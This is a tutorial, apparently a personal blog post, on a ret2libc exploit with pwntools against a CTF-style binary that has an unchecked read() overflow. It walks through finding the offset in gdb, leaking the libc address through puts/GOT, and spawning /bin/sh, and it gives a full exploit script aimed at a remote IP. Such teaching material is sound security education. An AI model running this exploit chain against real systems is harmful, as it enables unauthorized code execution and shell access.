How to perform an attack against a binary with randomized library addresses in memory - ret2libc & pwntools by example.
NOTICE I’m not very experienced in “offensive RE” ~> pwns. If you find any mistakes in my explanations, please let me know in the comments :)
Prerequisites
- exploitable (linux) binary
- python3 + pwntools (I’m using it in virtualenv)
- GDB + gef
# quick install
sudo apt install gdb python3 python3-pip
# install gef (https://github.com/hugsy/gef)
wget -O ~/.gdbinit-gef.py -q http://gef.blah.cat/py
echo source ~/.gdbinit-gef.py >> ~/.gdbinit
# install pwntools in virtualenv (https://docs.pwntools.com/en/stable/)
pip install virtualenv
virtualenv -p python3 venv
. ./venv/bin/activate
pip install pwntools
My exploitable binary has the following properties:
gef➤ checksec
[+] checksec for 'binary'
Canary : ✘
NX : ✓
PIE : ✘
Fortify : ✘
RelRO : Full
Hunt for the exploitable code
This tutorial focuses only on binaries with relocation enabled; it completely ignores PIE and stack canaries.
The easiest way to find exploitable code is to play with the binary and learn about its background. Note that exploitable functionality has to be reachable from a place where the binary interacts with the user (receiving & parsing packets, user input, configs).
In my case the binary has only 4 “input fields” and only one of them allows writing past the allocated buffer:
// ida pseudo-code:
int fill()
{
char buf[32]; // [rsp+0h] [rbp-20h] BYREF
memset(buf, 0, sizeof(buf));
printf("How much data do you want to store?\n> ");
read(0, buf, 0x400uLL); // buffer can be overwritten
return printf("\nEnjoy your %s", buf);
}
buf can hold only 32 bytes, but read can read up to 0x400 (1024) bytes, so we should be able to fill the buffer completely and overwrite the return address. The stack looks like this:
+----------------+
| return addr | <- return address saved when call fill was executed
+----------------+
| stored_rbp | <- saved RBP
+----------------+
| |
| buffer | <- local variables
| |
+----------------+
Protip
In assembly, call <func> behaves like two instructions: push <address of the next instruction>, jmp <func>. It saves the address of the next instruction on the stack and jumps to the called function. ret is analogous: it consists of a pop & jmp.
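To make the mechanics above a bit more concrete, here is a toy simulation in plain Python (no real memory is touched). The frame is modelled as a bytearray laid out like the diagram; the addresses 0x400f10, 0x7fffffffe290 and 0xdeadbeef are made-up values used only for illustration.

```python
import struct

BUF_SIZE = 32                            # char buf[32] from the pseudo-code
SAVED_RBP_SIZE = 8                       # saved RBP sits right above the buffer
RET_OFFSET = BUF_SIZE + SAVED_RBP_SIZE   # where the return address starts


def make_frame(return_addr, saved_rbp=0x7fffffffe290):
    """Build a toy stack frame: [buf][saved rbp][return address]."""
    frame = bytearray(BUF_SIZE)
    frame += struct.pack("<Q", saved_rbp)
    frame += struct.pack("<Q", return_addr)
    return frame


def unchecked_read(frame, data):
    """Mimic read(0, buf, 0x400): copy without checking the buffer size."""
    n = min(len(data), 0x400)
    frame[:n] = data[:n]
    return frame


def ret(frame):
    """Mimic `ret`: pop the 8-byte return address and 'jump' to it."""
    return struct.unpack_from("<Q", frame, RET_OFFSET)[0]


frame = make_frame(return_addr=0x400f10)   # hypothetical caller address
print(hex(ret(frame)))                     # 0x400f10

# 40 filler bytes reach the return address, the next 8 bytes replace it
payload = b"A" * RET_OFFSET + struct.pack("<Q", 0xdeadbeef)
unchecked_read(frame, payload)
print(hex(ret(frame)))                     # 0xdeadbeef
```

The only point of the sketch is that whoever controls the 8 bytes at offset 40 decides where ret jumps.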
Prove that you are in control
The next natural step is to verify that we can actually control the rip register. The easiest way to do that is to run the binary in gdb with gef installed and generate a pattern:
gef➤ pattern create 60
[+] Generating a pattern of 60 bytes
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaa
[+] Saved as '$_gef0'
Protip
The generated pattern consists of readable characters arranged so that every substring of a fixed length (8 characters here) is unique, which makes it easy to find the offset of a given substring.
Then just use the generated payload as input for the potentially vulnerable functionality. In my case I had to navigate to the proper menu and paste the payload as the choice option. As a result the program crashed and gdb caught the exception:
> aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaa
Enjoy your aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaa
Program received signal SIGSEGV, Segmentation fault.
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x49
$rbx : 0x0
$rcx : 0x0
$rdx : 0x00007ffff7dd18c0 → 0x0000000000000000
$rsp : 0x00007fffffffe278 → "faaaaaaagaaaaaaahaaa\n"
$rbp : 0x6161616161616165 ("eaaaaaaa"?)
$rsi : 0x00007fffffffbbb0 → "Enjoy your aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaa"
$rdi : 0x1
$rip : 0x0000000000400eec → <fill+162> ret
$r8 : 0x49
$r9 : 0x3d
$r10 : 0xffffffc3
$r11 : 0x246
$r12 : 0x00000000004006e0 → <_start+0> xor ebp, ebp
$r13 : 0x00007fffffffe370 → 0x0000000000000001
$r14 : 0x0
$r15 : 0x0
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffe278│+0x0000: "faaaaaaagaaaaaaahaaa\n" ← $rsp
0x00007fffffffe280│+0x0008: "gaaaaaaahaaa\n"
0x00007fffffffe288│+0x0010: 0x0000000a61616168 ("haaa\n"?)
0x00007fffffffe290│+0x0018: 0x0000000000401040 → <__libc_csu_init+0> push r15
0x00007fffffffe298│+0x0020: 0x00007ffff7a05b97 → <__libc_start_main+231> mov edi, eax
0x00007fffffffe2a0│+0x0028: 0x0000000000000001
0x00007fffffffe2a8│+0x0030: 0x00007fffffffe378 → 0x00007fffffffe5eb → "/tmp/binary"
0x00007fffffffe2b0│+0x0038: 0x0000000100008000
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x400ee5 <fill+155> call 0x400670 <printf@plt>
0x400eea <fill+160> nop
0x400eeb <fill+161> leave
→ 0x400eec <fill+162> ret
[!] Cannot disassemble from $PC
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "binary", stopped 0x400eec in fill (), reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x400eec → fill()
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x0000000000400eec in fill ()
Bingo! The program crashed because it tried to jump to an invalid address and execute instructions there. Now you can find the offset of the bytes that overwrote the return address:
gef➤ pattern offset $rsp
[+] Searching '$rsp'
[+] Found at offset 40 (little-endian search) likely
[+] Found at offset 33 (big-endian search)
Protip
We can find the overwritten return address at the top of the stack (rsp), because the processor failed to execute the ret instruction. rip still points to the problematic instruction.
Protip
As the argument for pattern offset you can also provide a string or a hex number:
gef➤ pattern offset faaaaaaagaaaaaaahaa
[+] Searching 'faaaaaaagaaaaaaahaa'
[+] Found at offset 40 (big-endian search)
gef➤ pattern offset 0x6161616161616166
[+] Searching '0x6161616161616166'
[+] Found at offset 40 (little-endian search) likely
[+] Found at offset 33 (big-endian search)
Save the found offset (40 in my case), we will need it later.
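If you are curious how such a pattern and the offset lookup work, below is a minimal pure-Python sketch. It uses the textbook de Bruijn sequence algorithm over lowercase letters with a window of 8 characters; this is my assumption about what the tool does, and the real gef implementation may differ in details. The function names pattern_create and pattern_offset are only illustrative.

```python
from itertools import islice
import string


def de_bruijn(alphabet, n):
    """Yield a de Bruijn sequence: every n-symbol window occurs only once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern_create(length, n=8):
    """Return the first `length` bytes of the sequence."""
    chars = islice(de_bruijn(string.ascii_lowercase, n), length)
    return "".join(chars).encode()


def pattern_offset(value, length=1024, n=8):
    """Find where a register value (read as little-endian) sits in the pattern."""
    needle = value.to_bytes(n, "little")
    return pattern_create(length, n).find(needle)


print(pattern_create(60).decode())
print(pattern_offset(0x6161616161616166))   # 40
```

The value 0x6161616161616166 is "faaaaaaa" when read as little-endian bytes, which is why the little-endian result is the one marked as likely.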
Develop the exploit (ret2libc)
A ret2libc attack consists of several simple steps:
- Leak the address of a libc function
- Calculate the address of libc in memory
- Redirect the execution flow to a libc function such as system to execute /bin/sh
Notice!
All steps need to be performed during a single program execution (due to the randomization). For this you need either 2 vulnerable functions or a way to call the vulnerable code twice ;)
PWNtools: quick start
We are going to start by loading the binaries (binary and libc) into pwntools:
import pwn
p = pwn.process('./binary')
#p = pwn.remote("138.68.182.108", 30784)
pwn.context(os='linux', arch='amd64')
#pwn.context.log_level = 'debug'
elf = pwn.ELF("./binary")
libc = pwn.ELF("./libc.so.6")
Protip
If you want to run this code against a remote target, uncomment pwn.remote (& comment out pwn.process); for debug logs uncomment pwn.context.log_level = 'debug'.
Now we can easily use the binaries' meta information, such as stored symbols.
The vulnerable code may be hidden behind some menus; to navigate through the program you can use several functions:
p.recvuntil(b"> ") # receive stdout until this substring
p.recv(0xff) # receive up to n bytes
p.recvline() # receive stdout until new line
p.send(b'foo') # send bytes
p.sendline(b'foo') # send b'foo\n' (with new line character)
# optionally use the timeout parameter to limit how long to wait for output
p.recv(0xff, timeout=0.5)
Leak address
So, now you have managed to load the binary, execute it and navigate to the vulnerable functionality.
Now it’s time to create the payload. The easiest way to do that is to use the ROP module.
The code below constructs a payload which will:
- Fill the buffer (32 bytes)
- Overwrite the saved base pointer on the stack (8 bytes)
- Call puts to leak the address of puts stored in the GOT
- Redirect the execution flow back to the same vulnerable function (fill in my case)
The script then joins the fill bytes with the ROP chain and sends the payload.
fill = b'A' * 40
rop = pwn.ROP(elf)
rop.call(elf.plt["puts"], [elf.got["puts"]])
rop.call(elf.symbols["fill"])
payload = b"".join([fill, rop.chain()])
p.sendline(payload)
Under the hood of rop.call
Different architectures call functions using specific calling conventions [1]. For example, on Linux x86-64 the 1st integer or pointer argument of a function is passed via the rdi register. If we want to call a function with an argument, we need to make sure that the argument value is stored in that register. For that we create a ROP chain which will:
- Jump to code that takes the argument from the stack and places it in rdi (pop rdi).
- Take the next address from the stack and jump to it (ret).
In general, the rop.call chain will look like this: <pop rdi; ret addr> <arg> <func_addr> (pwntools is capable of finding the gadgets needed to call a function with all its arguments).
PLT vs GOT [2]
- PLT - Procedure Linkage Table, contains stubs that jump to the target
- GOT - Global Offset Table, a table of the target addresses (resolved at runtime)
You can find these values by yourself:
$ objdump -D ./binary| grep puts
0000000000400650 <puts@plt>:
400650: ff 25 52 19 20 00 jmpq *0x201952(%rip) # 601fa8 <puts@GLIBC_2.2.5>
...
We can interpret the above output as:
- PLT address = 0x400650
- GOT entry = 0x601fa8
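The GOT entry address in the objdump comment is not magic; it follows from RIP-relative addressing. A small worked check, using only the numbers from the output above:

```python
# Values copied from the objdump line for puts@plt.
insn_addr = 0x400650      # address of the jmpq instruction
insn_len = 6              # ff 25 52 19 20 00 -> 6 bytes
displacement = 0x201952   # from jmpq *0x201952(%rip)

# RIP-relative operands are relative to the address of the NEXT instruction.
got_entry = insn_addr + insn_len + displacement
print(hex(got_entry))     # 0x601fa8
```

So the PLT stub simply jumps to whatever address is currently stored at 0x601fa8, and that stored value is what we want to leak.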
After sending the prepared payload to the program, the stack should look like this:
+----------------+
| ptr_fill | <- pointer to fill, executed again after puts returns
+----------------+
| ptr_plt_puts | <- pointer to puts function which will be executed
+----------------+
| ptr_got_puts | <- address to entry of puts in GOT, value will be printed by puts above
+----------------+
| ptr_poprdi | <- pointer to pop rdi; ret
+----------------+
| |
| fill | <- our "fill", which just overflows the buffer and saved rbp
| (A*40) |
| |
+----------------+
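For comparison, the chain produced by the two rop.call lines can also be assembled by hand. This is only a sketch using the standard struct module instead of pwntools: the puts addresses come from the objdump output, the fill address is derived from the gdb output (0x400eec is fill+162), and the pop rdi; ret gadget address is a hypothetical placeholder that you would have to look up in your own binary.

```python
import struct


def p64(value):
    """Pack an integer as 8 little-endian bytes (same idea as pwn.p64)."""
    return struct.pack("<Q", value)


PUTS_PLT = 0x400650          # from the objdump output
PUTS_GOT = 0x601fa8          # from the objdump output
FILL = 0x400eec - 162        # <fill+162> minus 162 -> start of fill
POP_RDI = 0x4010a3           # ASSUMPTION: hypothetical `pop rdi; ret` address

payload = b"".join([
    b"A" * 40,               # buffer (32) + saved rbp (8)
    p64(POP_RDI),            # overwritten return address: pop rdi; ret
    p64(PUTS_GOT),           # popped into rdi -> argument for puts
    p64(PUTS_PLT),           # ret jumps here: puts(address of the GOT entry)
    p64(FILL),               # puts returns here: run fill() again
])
print(len(payload))          # 72
```

In practice I would still let pwntools build the chain, since it finds the gadget for you.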
Now we need to parse the output; this part is specific to each program. I really recommend enabling debug output, which shows the transferred data.
Protip - Enable Debug Mode
pwn.context.log_level = 'debug'
# parse leaked address
p.recvuntil(b"Enjoy your ") # skip everything before the echoed input
raw_data = p.recvuntil(b'\n')
raw_data = raw_data.strip() # drop the trailing newline
raw_data = raw_data[-6:] # keep only the last 6 bytes (the leaked address)
leaked_puts = raw_data.ljust(8, b'\x00') # fill missing bytes with zeroes
leaked_puts = pwn.u64(leaked_puts)
Packing and Unpacking the bytes
pwntools contains built-in functions for packing and unpacking bytes, i.e. converting between byte strings and integers according to the environment configured with context (endianness is set automatically).
>>> pwn.p64(0x4142424245464748)
b'HGFEBBBA'
>>> pwn.u64(b'HEXIFYIT')
6073483730898928968 # 0x5449594649584548
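The same parsing can be tried offline with the standard struct module. The sample line below is made up (40 filler bytes, 3 bytes of a hypothetical gadget address, then 6 leaked bytes and the newline added by puts), so treat it as a sketch of the idea rather than real program output.

```python
import struct


def parse_leak(line):
    """Turn the raw line printed by puts into a 64-bit integer."""
    data = line[:-1] if line.endswith(b"\n") else line  # drop puts' newline
    data = data[-6:]                # the leaked address is the last 6 bytes
    data = data.ljust(8, b"\x00")   # pad to 8 bytes for unpacking
    return struct.unpack("<Q", data)[0]


# ASSUMPTION: hypothetical output, not captured from the real binary.
sample = b"A" * 40 + b"\xa3\x10\x40" + bytes.fromhex("c049a6f7ff7f") + b"\n"
leaked_puts = parse_leak(sample)
print(hex(leaked_puts))             # 0x7ffff7a649c0
```

Only 6 bytes arrive because the two highest bytes of a user-space address are zero here and puts stops at the first null byte. This version removes just the final newline, whereas strip() could also eat address bytes that happen to be whitespace characters.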
Run /bin/sh
The “last” step consists of the following substeps:
- Calculate the address of libc in memory
- Calculate the address of the system() function and its argument ("/bin/sh")
- Prepare the ROP chain & send it as input
Ok, but why?
You might be wondering why we don’t just call system() directly in the previous step. It seems much simpler than calling the same function once again. The reason is simple: there is no system PLT entry in our binary, so we can’t call it:
$ objdump -D ./binary| grep 'system'
# empty output
We don’t have it in our binary, so we need to find it in memory by using the leaked address of a common function, in our case puts.
pwn.info("Stage 2, ret2shell")
# calculate offset, base address of the libc in the memory
libc.address = leaked_puts - libc.symbols['puts']
# prepare the final payload
rop = pwn.ROP(libc)
rop.call(rop.find_gadget(['ret'])) # extra ret to fix stack alignment, you might not need it
rop.call(libc.symbols['system'], [next(libc.search(b"/bin/sh\x00"))]) # search with the null byte so that we don't match a /bin/sh followed by garbage like '/bin/shFEFE', which obviously doesn't exist
payload = b"".join([fill, rop.chain()])
p.sendline(payload)
p.interactive()
The last line (p.interactive()) gives us an interactive session with the spawned shell:
$ ps
PID TTY TIME CMD
26 ? 00:00:00 binary
27 ? 00:00:00 sh
28 ? 00:00:00 sh
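The arithmetic behind libc.address = leaked_puts - libc.symbols['puts'] can be checked in isolation. All numbers below are made-up example values (with pwntools the offsets come from libc.symbols and libc.search), and the page-alignment check is my own addition, not something the script above does.

```python
# ASSUMPTION: example offsets and leak, not taken from the author's libc.
PUTS_OFFSET = 0x809c0
SYSTEM_OFFSET = 0x4f440
BINSH_OFFSET = 0x1b3e9a


def libc_base(leaked_puts, puts_offset=PUTS_OFFSET):
    """Subtract the symbol offset from the leaked address to get the base."""
    base = leaked_puts - puts_offset
    # Libraries are mapped on page boundaries, so the low 12 bits must be 0.
    if base & 0xfff:
        raise ValueError(f"suspicious libc base {base:#x}, check the leak")
    return base


base = libc_base(0x7ffff7a649c0)
system_addr = base + SYSTEM_OFFSET
binsh_addr = base + BINSH_OFFSET
print(hex(base), hex(system_addr), hex(binsh_addr))
```

If the computed base is not page-aligned, the leak was most likely parsed incorrectly or the local libc.so.6 does not match the one used by the target.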
Full script
import pwn
#p = pwn.process('./binary')
p = pwn.remote("138.68.182.108", 30784)
pwn.context(os='linux', arch='amd64')
#pwn.context.log_level = 'debug'
elf = pwn.ELF("./binary")
libc = pwn.ELF("./libc.so.6")
pwn.info("Stage 1, leak puts addr")
p.recvuntil(...)
p.sendline(...)
p.recv(...)
# prepare payload
fill = b'A' * 40
rop = pwn.ROP(elf)
rop.call(elf.plt["puts"], [elf.got["puts"]])
rop.call(elf.symbols["fill"])
payload = b"".join([fill, rop.chain()])
p.sendline(payload)
p.recvuntil(b"Enjoy your ")
# extract leaked puts address
raw_data = p.recvuntil(b'\n')
raw_data = raw_data.strip() # drop the trailing newline
raw_data = raw_data[-6:] # keep only the last 6 bytes (the leaked address)
leaked_puts = raw_data.ljust(8, b'\x00') # fill missing bytes with zeroes
leaked_puts = pwn.u64(leaked_puts)
pwn.success(f'Leaked puts: {leaked_puts:x}')
pwn.info("Stage 2, ret2shell")
# calculate offset, base address of the libc in the memory
libc.address = leaked_puts - libc.symbols['puts']
# prepare the final payload
rop = pwn.ROP(libc)
rop.call(rop.find_gadget(['ret']))
rop.call(libc.symbols['system'], [next(libc.search(b"/bin/sh\x00"))])
payload = b"".join([fill, rop.chain()])
p.sendline(payload)
pwn.success("Have fun!")
p.interactive()